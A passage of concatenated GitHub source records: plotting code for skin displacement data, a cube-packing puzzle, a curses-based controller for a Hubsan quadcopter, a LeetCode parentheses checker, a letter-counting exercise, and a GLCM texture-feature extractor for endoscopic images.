xt_dic_spr[0][:,1],\n c='b', s=20, marker='+')\n\n ax.scatter(xt_dic_spr[index][:,0],\n xt_dic_spr[index][:,1],\n c='b', s=20, marker='x')\n\n for i, xi_i in zip(indices_points_genuine, xt_dic[index]):\n ax.annotate(i, xi_i, fontsize='small')\n\n for i, xi_i in zip(indices_points_spurious, xt_dic_spr[index]):\n ax.annotate(i, xi_i, fontsize='small')\n\n ax.legend(['undeformed', 'deformed'])\n\n if title is not None:\n ax.set_title(title)\n\n ax.set_xlabel('x (mm)')\n ax.set_ylabel('y (mm)')\n\n ax.axis('equal')\n\n return ax\n\n\ndef plot_data_frames(title=None, duration=0.05, margin=0.05,\n exclude_registration_points=False, annotate=False):\n\n fh = plt.figure(title)\n fh.clear()\n ax = fh.add_subplot(1,1,1)\n\n if exclude_registration_points:\n xt_ends = [xt_dic[0], xt_dic[-1]]\n else:\n xt_ends = [np.concatenate([a[None,:], b[None,:], c], axis=0)\n for a, b, c in zip((xt_pad_mov[0], xt_pad_mov[-1]),\n (xt_pad_fix[0], xt_pad_fix[-1]),\n (xt_dic[0], xt_dic[-1]))]\n\n xmin = min(xi[:,0].min() for xi in xt_ends)\n ymin = min(xi[:,1].min() for xi in xt_ends)\n xmax = max(xi[:,0].max() for xi in xt_ends)\n ymax = max(xi[:,1].max() for xi in xt_ends)\n\n m = max(xmax-xmin, ymax-ymin) * margin\n axis_limits = xmin-m, xmax+m, ymin-m, ymax+m\n\n for index in range(number_of_measurements):\n\n ax.clear()\n\n plot_data_frame(index, title, ax, annotate)\n\n ax.axis(axis_limits)\n\n fh.canvas.draw()\n fh.canvas.flush_events()\n\n time.sleep(duration)\n\n return ax\n\n\ndef save_data_frame(fh, name=\"Untitled\"):\n\n if not isinstance(fh, plt.Figure):\n raise TypeError('Parameter `fh` must be of type `plt.Figure`.')\n\n if not os.path.isdir(DIRECTORY_OUTPUT_FIGURES):\n os.makedirs(DIRECTORY_OUTPUT_FIGURES)\n\n savepath = os.path.join(DIRECTORY_OUTPUT_FIGURES, name)\n\n plt.savefig(savepath+'.png', dpi=300)\n plt.savefig(savepath+'.svg')\n plt.savefig(savepath+'.pdf')\n\n\nif __name__ == \"__main__\":\n\n plt.interactive(True)\n plt.close('all')\n plt.show()\n\n FRAME_INDEX = -1\n\n if PLOT_DATA or SAVE_PLOTS:\n\n title = \"Displacement Field Measurment (Last Snapshot)\"\n\n ax = plot_data_frame(FRAME_INDEX, title)\n\n fh = ax.get_figure()\n\n if SAVE_PLOTS:\n\n file_name = title.lower().strip('()')\n for c in (' (', ') ', '(', ')', ' '):\n file_name = file_name.replace(c, '_')\n\n save_data_frame(fh, file_name)\n\n if not PLOT_DATA:\n fh.close()\n\n if WRITE_DATA:\n write_data_files({\n 'xt_dic': xt_dic,\n 'xt_pad_mov': np.array(xt_pad_mov, ndmin=2),\n 'xt_pad_fix': np.array(xt_pad_fix, ndmin=2),\n })\n","repo_name":"aflahelouneg/inverse_identification_soft_tissue","sub_path":"examples/human_skin/bimaterial/data/displacement.py","file_name":"displacement.py","file_ext":"py","file_size_in_byte":11948,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"34210328763","text":"length, width, height = map(int, input().split())\nn = int(input())\ncube = [list(map(int, input().split())) for _ in range(n)]\nvolume = length * width * height\nans = 0\nbefore = 0\ncube.sort(reverse=True)\n\nfor w, cnt in cube:\n before <<= 3\n v = 2 ** w\n maxCnt = (length // v) * (width // v) * (height // v) - before\n maxCnt = min(cnt, maxCnt)\n ans += maxCnt\n before += maxCnt\n\nif before == volume:\n print(ans)\nelse:\n print(-1)","repo_name":"Sangmeeeee/SSAFY","sub_path":"week7/yein/problem3/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"39"} +{"seq_id":"39553365410","text":"from hubsan import Hubsan\nimport RPi.GPIO as GPIO\nimport a7105\nimport curses\nimport time\n\nprecision = 0.02\nquad = None\nselection = 0\n\ndef display(stdscr):\n stdscr.clear()\n stdscr.addstr(0, 0, 'Throttle:')\n stdscr.addstr(0, 11, '< {0:.2f} >'.format(quad.throttle), curses.A_REVERSE if selection == 0 else 0)\n stdscr.addstr(1, 0, 'Yaw:')\n stdscr.addstr(1, 11, '< {0:.2f} >'.format(quad.yaw), curses.A_REVERSE if selection == 1 else 0)\n stdscr.addstr(2, 0, 'Pitch:')\n stdscr.addstr(2, 11, '< {0:.2f} >'.format(quad.pitch), curses.A_REVERSE if selection == 2 else 0)\n stdscr.addstr(3, 0, 'Roll:')\n stdscr.addstr(3, 11, '< {0:.2f} >'.format(quad.roll), curses.A_REVERSE if selection == 3 else 0)\n stdscr.addstr(4, 0, 'Leds:')\n stdscr.addstr(4, 11, '< {0} >'.format(quad.leds), curses.A_REVERSE if selection == 4 else 0)\n stdscr.addstr(5, 0, 'Flips:')\n stdscr.addstr(5, 11, '< {0} >'.format(quad.flips), curses.A_REVERSE if selection == 5 else 0)\n\n stdscr.refresh()\n\ndef main(stdscr):\n global selection\n curses.curs_set(0)\n stdscr.nodelay(True)\n while True:\n display(stdscr)\n event = stdscr.getch()\n\n if event == curses.KEY_DOWN:\n if selection < 5: selection += 1\n elif event == curses.KEY_UP:\n if selection > 0: selection -= 1\n elif event == curses.KEY_LEFT:\n if selection == 0: quad.throttle -= precision\n if selection == 1: quad.yaw -= precision\n if selection == 2: quad.pitch -= precision\n if selection == 3: quad.roll -= precision\n if selection == 4: quad.leds = not quad.leds\n if selection == 5: quad.flips = not quad.flips\n elif event == curses.KEY_RIGHT:\n if selection == 0: quad.throttle += precision\n if selection == 1: quad.yaw += precision\n if selection == 2: quad.pitch += precision\n if selection == 3: quad.roll += precision\n if selection == 4: quad.leds = not quad.leds\n if selection == 5: quad.flips = not quad.flips\n elif event == ord('q'):\n break\n elif event == ord('s'):\n # emergency stop\n quad.throttle = 0.0\n quad.yaw = 0.5\n quad.pitch = 0.5\n quad.roll = 0.5\n quad.leds = True\n quad.flips = False\n\n\nif __name__ == \"__main__\":\n a7105.init()\n quad = Hubsan()\n quad.bind()\n curses.wrapper(main)\n quad.stop()\n","repo_name":"phito/rpi-hubsanx4","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"72109531633","text":"# coding:utf-8\n\n\"\"\"\n20. 有效的括号\n\n给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n\n有效字符串需满足:\n\n左括号必须用相同类型的右括号闭合。\n左括号必须以正确的顺序闭合。\n注意空字符串可被认为是有效字符串。\n\n示例 1:\n\n输入: \"()\"\n输出: true\n示例 2:\n\n输入: \"()[]{}\"\n输出: true\n示例 3:\n\n输入: \"(]\"\n输出: false\n示例 4:\n\n输入: \"([)]\"\n输出: false\n示例 5:\n\n输入: \"{[]}\"\n输出: true\n\n\"\"\"\n\n\ndef isValid(s):\n # 定义一个空栈\n stack = []\n\n mapping = {')': '(', '}': '{', ']': '['}\n\n for char in s:\n # 如果是右括号\n if char in mapping:\n # 如果栈不为空,将栈顶的元素弹出\n # Otherwise assign a dummy value of '#' to the top_element variable\n top_element = stack.pop() if stack else '#'\n\n # 如果该右括号在map中对应的左括号是否与栈顶元素不相等\n if mapping[char] != top_element:\n return False\n\n # 如果是左括号,直接进栈\n else:\n stack.append(char)\n\n # 如果 stack 为 0,则 not stack 返回 True\n # 如果 stack 不为 0,则 not stack 返回 False\n return not stack\n\n\nstr = \"{[]}()\"\nresult = isValid(str)\nprint(result)\n","repo_name":"yeqianzhi/LeetCode_2","sub_path":"Stack/Easy/_20_ValidParentheses.py","file_name":"_20_ValidParentheses.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"40732220250","text":"# Programming Assignment-2: Letters\r\n\r\n'''\r\n\tQuestion : Write a program that accepts a sentence and calculate the number of upper case letters and lower case letters.\r\n'''\r\n\r\n# Code\r\n\r\ns=input().strip()\r\nu=0;l=0\r\nfor i in s:\r\n if i.isupper():u+=1\r\n elif i.islower():l+=1\r\nprint(u,l)","repo_name":"avinash3699/NPTEL-The-Joy-of-Computing-using-Python","sub_path":"Week 12/Programming Assignment 2 Letters.py","file_name":"Programming Assignment 2 Letters.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"39"} +{"seq_id":"21242973944","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 14 13:08:48 2019\n\n@author: Nataly\n\"\"\"\n\nimport cv2\nimport numpy as np\nimport glob\nfrom yolovoc import yolo2voc\nfrom readboxes import read_boxes\nfrom matplotlib import pyplot as plt\nfrom rOI import ROI\nfrom skimage.feature import greycomatrix, greycoprops\nimport skimage.feature\nfrom scipy.stats import kurtosis\nimport statistics as stats\nimport pywt\nimport pywt.data\n\n#tamañoA = []\n#tamañoB = []\ndef Fourier(inA):\n f = np.fft.fft2(inA)\n fshift = np.fft.fftshift(f)\n fourier = 20*np.log(np.abs(fshift))\n fourier=fourier.astype(np.uint8)\n return fourier \n \ndef GLCM (imA):\n a=int(np.max(imA))\n g = skimage.feature.greycomatrix(imA, [1], [0], levels=a+1, symmetric=False, normed=True) \n contraste=skimage.feature.greycoprops(g, 'contrast')[0][0]\n energia=skimage.feature.greycoprops(g, 'energy')[0][0]\n homogeneidad=skimage.feature.greycoprops(g, 'homogeneity')[0][0]\n correlacion=skimage.feature.greycoprops(g, 'correlation')[0][0]\n disimi= greycoprops(g, 'dissimilarity') \n ASM= greycoprops(g, 'ASM')\n entropia=skimage.measure.shannon_entropy(g) \n return g,contraste,energia,homogeneidad, correlacion, disimi, ASM,entropia\n# plt.imshow(cropped)\ndef tama(a,b):\n if a<600 or b<600:\n tamañoA = 200\n tamañoB = 200\n else:\n tamañoA = 600\n tamañoB = 600\n return tamañoA,tamañoB\n \nenergiaDM_LH=[]\nhomogeneidadDM_LH=[]\ncorrelacionDM_LH=[]\ndisimiDM_LH=[]\nASMDM_LH=[]\nentropiaDM_LH=[]\ncontrasteDM_LH=[]\nmediaglcmDM_LH=[] \nentropianoglcmDM_LH=[]\nmediaDM_LH=[]\nmodaDM_LH=[] \ndesviacionDM_LH=[]\ncurtosisDM_LH=[]\nnergianoglcmDM_LH=[]\n ##RE\nenergiaRE_LH=[]\nhomogeneidadRE_LH=[]\ncorrelacionRE_LH=[]\ndisimiRE_LH=[]\nASMRE_LH=[]\nentropiaRE_LH=[]\ncontrasteRE_LH=[]\nmediaglcmRE_LH=[]\nentropianoglcmRE_LH=[]\nmediaRE_LH=[]\nmodaRE_LH=[]\ndesviacionRE_LH=[]\ncurtosisRE_LH=[]\nnergianoglcmRE_LH=[]\n ##NO\nenergiaNO_LH=[]\nhomogeneidadNO_LH=[]\ncorrelacionNO_LH=[]\ndisimiNO_LH=[]\nASMNO_LH=[]\nentropiaNO_LH=[]\ncontrasteNO_LH=[]\nmediaglcmNO_LH=[]\nentropianoglcmNO_LH=[]\nmediaNO_LH=[]\nmodaNO_LH=[]\ndesviacionNO_LH=[]\ncurtosisNO_LH=[]\nnergianoglcmNO_LH=[]\n \n ##GLCMsinfourierLL\nenergiaDM_SF_LH=[]\nhomogeneidadDM_SF_LH=[]\ncorrelacionDM_SF_LH=[]\ndisimiDM_SF_LH=[]\nASMDM_SF_LH=[]\nentropiaDM_SF_LH=[]\ncontrasteDM_SF_LH=[]\nmediaglcmDM_SF_LH=[]\nentropianoglcmDM_SF_LH=[]\nmediaDM_SF_LH=[]\nmodaDM_SF_LH=[]\ndesviacionDM_SF_LH=[]\ncurtosisDM_SF_LH=[]\nnergianoglcmDM_SF_LH=[]\n #RE\nenergiaRE_SF_LH=[]\nhomogeneidadRE_SF_LH=[]\ncorrelacionRE_SF_LH=[]\ndisimiRE_SF_LH=[]\nASMRE_SF_LH=[]\nentropiaRE_SF_LH=[]\ncontrasteRE_SF_LH=[]\nmediaglcmRE_SF_LH=[]\nentropianoglcmRE_SF_LH=[]\nmediaRE_SF_LH=[]\nmodaRE_SF_LH=[]\ndesviacionRE_SF_LH=[]\ncurtosisRE_SF_LH=[]\nnergianoglcmRE_SF_LH=[]\n #NO\nenergiaNO_SF_LH=[]\nhomogeneidadNO_SF_LH=[]\ncorrelacionNO_SF_LH=[]\ndisimiNO_SF_LH=[]\nASMNO_SF_LH=[]\nentropiaNO_SF_LH=[]\ncontrasteNO_SF_LH=[]\nmediaglcmNO_SF_LH=[]\nentropianoglcmNO_SF_LH=[]\nmediaNO_SF_LH=[]\nmodaNO_SF_LH=[]\ndesviacionNO_SF_LH=[]\ncurtosisNO_SF_LH=[]\nnergianoglcmNO_SF_LH=[]\n\n\nfor image in glob.glob('*.jpg'):\n # image = '00002.jpg'\n im = cv2.imread(image)\n im=cv2.normalize(im, None, 0, 255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n aa,bb,c = im.shape \n imaROI=ROI(im)\n imaROI=cv2.normalize(imaROI, None, 0, 1, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC3)\n \n #cv2.imshow('Grays',imaROI)\n #cv2.destroyAllWindows()\n HSV=cv2.cvtColor(im,cv2.COLOR_RGB2HSV)\n H,S,V=cv2.split(HSV)\n V=V*imaROI\n \n for z in range(c):\n im[:,:,z]=im[:,:,z]*imaROI\n \n \n _,contours,_= cv2.findContours(imaROI,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n areas = [cv2.contourArea(c) for c in contours]\n max_index = np.argmax(areas)\n cnt=contours[max_index]\n x3,y3,w3,h3 = cv2.boundingRect(cnt)\n #cv2.rectangle(im,(x,y),(x+w,y+h),(0,255,0),2)\n #\"\"\" \n# cv2.imshow(\"Show\",im[y:y+h,x:x+w])\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n# imf=im.copy()\n# cv2.rectangle(imf,(x,y),(x+w,y+h),(0,255,0),2)\n# cv2.imshow(\"Show\",imf)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n #\"\"\"\n #plt.imshow(im)\n #plt.show()\n #imagenROI=im*imaROI\n filetxt=image[0:len(image)-3]+'txt' \n bboxfile=filetxt\n boxes = read_boxes(bboxfile)\n boxes_abs = yolo2voc(boxes, im.shape) \n re=0\n dm=0\n imunda=0\n imSinBBOX=im.copy()\n \n \n for b in boxes_abs:\n cls, x1, y1, x2, y2 = b\n if cls == 3:\n print('DM')\n \n dm=dm+1 \n #print(image,dm)\n a,b= V[int(y1):int(y2),int(x1):int(x2)].shape\n tamañoA,tamañoB=tama(a,b)\n V1= V[int(y1):int(y2),int(x1):int(x2)]\n vecesA = int(a/tamañoA)\n vecesB = int(b/tamañoB)\n \n for f in range(0,a-tamañoA,tamañoA):\n for c in range(0,b-tamañoB,tamañoB):\n #print(f,c)\n cropped = V1[f:f+tamañoA,c:c+tamañoB]\n croppedrgb = im[f:f+tamañoA,c:c+tamañoB]\n \n #test2[f:f+tamañoA,c:c+tamañoB]=test[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped = V1[f:f+tamañoA,c:]\n croppedrgb = im[f:f+tamañoA,c:]\n #test2[f:f+tamañoA,c:]=test[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n #print('ola')\n if c==tamañoB*vecesB-tamañoB:\n cropped = V1[f:,c:]\n croppedrgb = im[f:,c:]\n \n #test2[f:,c:]=test[f:,c:]\n else:\n cropped = V1[f:,c:c+tamañoB]\n croppedrgb = im[f:,c:c+tamañoB]\n \n #test2[f:,c:c+tamañoB]=test[f:,c:c+tamañoB]\n #print('dani')\n #cropFou=cropped\n cropped_1=cropped.copy()\n croppedrgb_1=croppedrgb.copy()\n cropFou=Fourier(cropped)\n ch= cropFou.shape\n if len(ch)>2:\n cropFou=cropFou[:,:,0]\n \n g,contraste,energia,homogeneidad, correlacion, disimi, ASM,entropia=GLCM(cropFou)\n contrasteDM_LH.append(contraste)\n energiaDM_LH.append(energia)\n homogeneidadDM_LH.append(homogeneidad)\n correlacionDM_LH.append(correlacion)\n disimiDM_LH.append(disimi)\n ASMDM_LH.append(ASM)\n entropiaDM_LH.append(entropia)\n mediaglcmDM_LH.append(np.mean(g)) \n entropianoglcmDM_LH.append(skimage.measure.shannon_entropy(cropFou))\n mediaDM_LH.append(np.mean(cropFou))\n modaDM_LH.append(np.median(g)) \n desviacionDM_LH.append(np.var(cropFou))\n curtosisDM_LH.append(sum(kurtosis(cropFou)))\n nergianoglcmDM_LH.append(np.median(cropFou))\n \"\"\" #Sin Fourier \"\"\"\n cropFou_1=cropped_1\n ch= cropFou_1.shape\n if len(ch)>2:\n cropFou_1=cropFou_1[:,:,0]\n \n g_1,contraste_1,energia_1,homogeneidad_1, correlacion_1, disimi_1, ASM_1,entropia_1=GLCM(cropFou_1)\n contrasteDM_SF_LH.append(contraste_1)\n energiaDM_SF_LH.append(energia_1)\n homogeneidadDM_SF_LH.append(homogeneidad_1)\n correlacionDM_SF_LH.append(correlacion_1)\n disimiDM_SF_LH.append(disimi_1)\n ASMDM_SF_LH.append(ASM_1)\n entropiaDM_SF_LH.append(entropia_1)\n mediaglcmDM_SF_LH.append(np.mean(g_1)) \n entropianoglcmDM_SF_LH.append(skimage.measure.shannon_entropy(cropFou_1))\n mediaDM_SF_LH.append(np.mean(cropFou_1))\n modaDM_SF_LH.append(np.median(g_1)) \n desviacionDM_SF_LH.append(np.var(cropFou_1))\n curtosisDM_SF_LH.append(sum(kurtosis(cropFou_1)))\n nergianoglcmDM_SF_LH.append(np.median(cropFou_1))\n \n\n if cls==0:\n re=re+1 \n print(re)\n if cls==2:\n imunda=imunda+1\n# imSinBBOX[int(y1):int(y2),int(x1):int(x2)]=0\n \n# print('cls', cls)\n# if cls!=0 and cls!=1 and cls!=2 and cls!=3 and cls!=4 and cls!=5 and cls!=6:\n# plt.imshow(im)\n# plt.show() \n# re=re+1\n if re > 0 and dm==0 and imunda==0:\n inta=V[y3:y3+h3,x3:x3+w3]\n aa,bb=inta.shape\n tamañoA,tamañoB=tama(aa,bb)\n vecesA = int(aa/tamañoA)\n vecesB = int(bb/tamañoB)\n \n for f in range(0,aa-tamañoA,tamañoA):\n for c in range(0,bb-tamañoB,tamañoB):\n cropped2 = inta[f:f+tamañoA,c:c+tamañoB]\n croppedrgb2 = im[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped2 = inta[f:f+tamañoA,c:]\n croppedrgb2 = im[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n if c==tamañoB*vecesB-tamañoB:\n cropped2 = inta[f:,c:]\n croppedrgb2 = im[f:,c:]\n else:\n cropped2 = inta[f:,c:c+tamañoB]\n croppedrgb2 = im[f:,c:c+tamañoB]\n cropped2_1=cropped2.copy()\n croppedrgb2_1=croppedrgb2.copy()\n\n \"\"\" #Con Fourier\"\"\"\n cropFou2=Fourier(cropped2)\n ch= cropFou2.shape\n if len(ch)>2:\n cropFou2=cropFou2[:,:,0]\n \n g2,contraste2,energia2,homogeneidad2, correlacion2, disimi2, ASM2,entropia2=GLCM(cropFou2)\n contrasteRE_LH.append(contraste2)\n energiaRE_LH.append(energia2)\n homogeneidadRE_LH.append(homogeneidad2)\n correlacionRE_LH.append(correlacion2)\n disimiRE_LH.append(disimi2)\n ASMRE_LH.append(ASM2)\n entropiaRE_LH.append(entropia2)\n mediaglcmRE_LH.append(np.mean(g2)) \n entropianoglcmRE_LH.append(skimage.measure.shannon_entropy(cropFou2))\n mediaRE_LH.append(np.mean(cropFou2))\n modaRE_LH.append(np.median(g2)) \n desviacionRE_LH.append(np.var(cropFou2))\n curtosisRE_LH.append(sum(kurtosis(cropFou2)))\n nergianoglcmRE_LH.append(np.median(cropFou2))\n \"\"\" #Sin Fourier\"\"\"\n cropFou2_1= cropped2_1\n ch= cropFou2_1.shape\n if len(ch)>2:\n cropFou2_1=cropFou2_1[:,:,0]\n \n g2_1,contraste2_1,energia2_1,homogeneidad2_1, correlacion2_1, disimi2_1, ASM2_1,entropia2_1=GLCM(cropFou2_1)\n contrasteRE_SF_LH.append(contraste2_1)\n energiaRE_SF_LH.append(energia2_1)\n homogeneidadRE_SF_LH.append(homogeneidad2_1)\n correlacionRE_SF_LH.append(correlacion2_1)\n disimiRE_SF_LH.append(disimi2_1)\n ASMRE_SF_LH.append(ASM2_1)\n entropiaRE_SF_LH.append(entropia2_1)\n mediaglcmRE_SF_LH.append(np.mean(g2_1)) \n entropianoglcmRE_SF_LH.append(skimage.measure.shannon_entropy(cropFou2_1))\n mediaRE_SF_LH.append(np.mean(cropFou2_1))\n modaRE_SF_LH.append(np.median(g2_1)) \n desviacionRE_SF_LH.append(np.var(cropFou2_1))\n curtosisRE_SF_LH.append(sum(kurtosis(cropFou2_1)))\n nergianoglcmRE_SF_LH.append(np.median(cropFou2_1))\n \n if re==0 and dm==0 and imunda==0:\n inta3=V[y3:y3+h3,x3:x3+w3]\n aaa,bbb=inta3.shape\n tamañoA,tamañoB=tama(aaa,bbb)\n vecesA = int(aaa/tamañoA)\n vecesB = int(bbb/tamañoB)\n \n for f in range(0,aaa-tamañoA,tamañoA):\n for c in range(0,bbb-tamañoB,tamañoB):\n cropped3 = inta3[f:f+tamañoA,c:c+tamañoB]\n croppedrgb3 = im[f:f+tamañoA,c:c+tamañoB]\n if c==tamañoB*vecesB-tamañoB:\n cropped3 = inta3[f:f+tamañoA,c:]\n croppedrgb3 = im[f:f+tamañoA,c:]\n if f==tamañoA*vecesA-tamañoA:\n if c==tamañoB*vecesB-tamañoB:\n cropped3 = inta3[f:,c:]\n croppedrgb3 = im[f:,c:]\n else:\n cropped3 = inta3[f:,c:c+tamañoB]\n croppedrgb3 = im[f:,c:c+tamañoB]\n cropped3_1=cropped3.copy()\n croppedrgb3_1=croppedrgb3.copy()\n\n \"\"\" #Con Fourier\"\"\"\n cropFou3=Fourier(cropped3)\n ch= cropFou3.shape\n if len(ch)>2:\n cropFou3=cropFou3[:,:,0]\n \n g3,contraste3,energia3,homogeneidad3, correlacion3, disimi3, ASM3,entropia3=GLCM(cropFou3)\n contrasteNO_LH.append(contraste3)\n energiaNO_LH.append(energia3)\n homogeneidadNO_LH.append(homogeneidad3)\n correlacionNO_LH.append(correlacion3)\n disimiNO_LH.append(disimi3)\n ASMNO_LH.append(ASM3)\n entropiaNO_LH.append(entropia3)\n mediaglcmNO_LH.append(np.mean(g3)) \n entropianoglcmNO_LH.append(skimage.measure.shannon_entropy(cropFou3))\n mediaNO_LH.append(np.mean(cropFou3))\n modaNO_LH.append(np.median(g3)) \n desviacionNO_LH.append(np.var(cropFou3))\n curtosisNO_LH.append(sum(kurtosis(cropFou3)))\n nergianoglcmNO_LH.append(np.median(cropFou3))\n \"\"\" #Sin Fourier\"\"\"\n cropFou3_1= cropped3_1\n ch= cropFou3_1.shape\n if len(ch)>2:\n cropFou3_1=cropFou3_1[:,:,0]\n \n g3_1,contraste3_1,energia3_1,homogeneidad3_1, correlacion3_1, disimi3_1, ASM3_1,entropia3_1=GLCM(cropFou3_1)\n contrasteNO_SF_LH.append(contraste3_1)\n energiaNO_SF_LH.append(energia3_1)\n homogeneidadNO_SF_LH.append(homogeneidad3_1)\n correlacionNO_SF_LH.append(correlacion3_1)\n disimiNO_SF_LH.append(disimi3_1)\n ASMNO_SF_LH.append(ASM3_1)\n entropiaNO_SF_LH.append(entropia3_1)\n mediaglcmNO_SF_LH.append(np.mean(g3_1)) \n entropianoglcmNO_SF_LH.append(skimage.measure.shannon_entropy(cropFou3_1))\n mediaNO_SF_LH.append(np.mean(cropFou3_1))\n modaNO_SF_LH.append(np.median(g3_1)) \n desviacionNO_SF_LH.append(np.var(cropFou3_1))\n curtosisNO_SF_LH.append(sum(kurtosis(cropFou3_1)))\n nergianoglcmNO_SF_LH.append(np.median(cropFou3_1))\n ###ROJO\n \n \n \nimport pandas as pd \ndatos = {'EnergiaDM':energiaDM_LH,\n 'HomogeneidadDM':homogeneidadDM_LH,\n 'CorrelaciónDM':correlacionDM_LH,\n 'DisimilitudDM':disimiDM_LH,\n 'ASM_DM':ASMDM_LH,\n 'EntropíaDM':entropiaDM_LH,\n 'ContrasteDM':contrasteDM_LH,\n 'Media(glcm)DM':mediaglcmDM_LH,\n 'Entropia(no glcm)DM':entropianoglcmDM_LH,\n 'MediaDM':mediaDM_LH,\n 'MedianaGLCM':modaDM_LH,\n 'VarianzaDM':desviacionDM_LH,\n 'CurtosisDM':curtosisDM_LH,\n 'Energia(no glcm)DM_LH':nergianoglcmDM_LH,\n 'Mediana':energiaDM_SF_LH,\n 'HomogeneidadDM(sinF)_LH':homogeneidadDM_SF_LH,\n 'CorrelaciónDM(sinF)_LH':correlacionDM_SF_LH,\n 'DisimilitudDM(sinF)_LH':disimiDM_SF_LH,\n 'ASMDM(sinF)_LH':ASMDM_SF_LH,\n 'EntropíaDM(sinF)_LH':entropiaDM_SF_LH,\n 'ContrasteDM(sinF)_LH':contrasteDM_SF_LH,\n 'Media(glcm)DM(sinF)_LH':mediaglcmDM_SF_LH,\n 'Entropia(no glcm)DM(sinF)_LH':entropianoglcmDM_SF_LH,\n 'MediaDM(sinF)_LH':mediaDM_SF_LH,\n 'MedianaGLCM_SF':modaDM_SF_LH,\n 'VarianzaDM(sinF)_LH':desviacionDM_SF_LH,\n 'CurtosisDM(sinF)_LH':curtosisDM_SF_LH,\n 'MedianaSF':nergianoglcmDM_SF_LH}\n\ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_DM.xlsx') \n\ndatos = {'EnergiaRE_LH':energiaRE_LH,\n 'HomogeneidadRE_LH':homogeneidadRE_LH,\n 'CorrelaciónRE_LH':correlacionRE_LH,\n 'DisimilitudRE_LH':disimiRE_LH,\n 'ASM_RE_LH':ASMRE_LH,\n 'EntropíaRE_LH':entropiaRE_LH,\n 'ContrasteRE_LH':contrasteRE_LH,\n 'Media(glcm)RE_LH':mediaglcmRE_LH,\n 'Entropia(no glcm)RE_LH':entropianoglcmRE_LH,\n 'MediaRE_LH':mediaRE_LH,\n 'MedianaGLCMRE_LH':modaRE_LH,\n 'VarianzaRE_LH':desviacionRE_LH,\n 'CurtosisRE_LH':curtosisRE_LH,\n 'Mediana(no glcm)RE_LH':nergianoglcmRE_LH,\n 'EnergiaRE(sinF)_LH':energiaRE_SF_LH,\n 'HomogeneidadRE(sinF)_LH':homogeneidadRE_SF_LH,\n 'CorrelaciónRE(sinF)_LH':correlacionRE_SF_LH,\n 'DisimilitudRE(sinF)_LH':disimiRE_SF_LH,\n 'ASMRE(sinF)_LH':ASMRE_SF_LH,\n 'EntropíaRE(sinF)_LH':entropiaRE_SF_LH,\n 'ContrasteRE(sinF)_LH':contrasteRE_SF_LH,\n 'Media(glcm)RE(sinF)_LH':mediaglcmRE_SF_LH,\n 'Entropia(no glcm)RE(sinF)_LH':entropianoglcmRE_SF_LH,\n 'MediaRE(sinF)_LH':mediaRE_SF_LH,\n 'MedianaGLCMRE(sinF)_LH':modaRE_SF_LH,\n 'VarianzaRE(sinF)_LH':desviacionRE_SF_LH,\n 'CurtosisRE(sinF)_LH':curtosisRE_SF_LH,\n 'mediana(no glcm)RE(sinF)_LH':nergianoglcmRE_SF_LH}\ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_RE.xlsx') \n \n \n ##NO\ndatos={ 'EnergiaNO_LH':energiaNO_LH,\n 'HomogeneidadNO_LH':homogeneidadNO_LH,\n 'CorrelaciónNO_LH':correlacionNO_LH,\n 'DisimilitudNO_LH':disimiNO_LH,\n 'ASM_NO_LH':ASMNO_LH,\n 'EntropíaNO_LH':entropiaNO_LH,\n 'ContrasteNO_LH':contrasteNO_LH,\n 'Media(glcm)NO_LH':mediaglcmNO_LH,\n 'Entropia(no glcm)NO_LH':entropianoglcmNO_LH,\n 'MediaNO_LH':mediaNO_LH,\n 'MedianaGLCMNO_LH':modaNO_LH,\n 'VarianzanNO_LH':desviacionNO_LH,\n 'CurtosisNO_LH':curtosisNO_LH,\n 'Mediana(no glcm)NO_LH':nergianoglcmNO_LH,\n 'EnergiaNO(sinF)_LH':energiaNO_SF_LH,\n 'HomogeneidadNO(sinF)_LH':homogeneidadNO_SF_LH,\n 'CorrelaciónNO(sinF)_LH':correlacionNO_SF_LH,\n 'DisimilitudNO(sinF)_LH':disimiNO_SF_LH,\n 'ASMNO(sinF)_LH':ASMNO_SF_LH,\n 'EntropíaNO(sinF)_LH':entropiaNO_SF_LH,\n 'ContrasteNO(sinF)_LH':contrasteNO_SF_LH,\n 'Media(glcm)NO(sinF)_LH':mediaglcmNO_SF_LH,\n 'Entropia(no glcm)NO(sinF)_LH':entropianoglcmNO_SF_LH,\n 'MediaNO(sinF)_LH':mediaNO_SF_LH,\n 'MedianaGLCMNO(sinF)_LH':modaNO_SF_LH,\n 'VarianzaNO(sinF)_LH':desviacionNO_SF_LH,\n 'CurtosisNO(sinF)_LH':curtosisNO_SF_LH,\n 'Mediana(no glcm)NO(sinF)_LH':nergianoglcmNO_SF_LH}\n \ndatos = pd.DataFrame(datos)\ndatos.to_excel('CaracteristicasGLCM_NO.xlsx') \n ","repo_name":"NatalyTinoco/Trabajo-de-grado_Artefactos","sub_path":"TODAAS/GLCM500x500.py","file_name":"GLCM500x500.py","file_ext":"py","file_size_in_byte":20251,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} 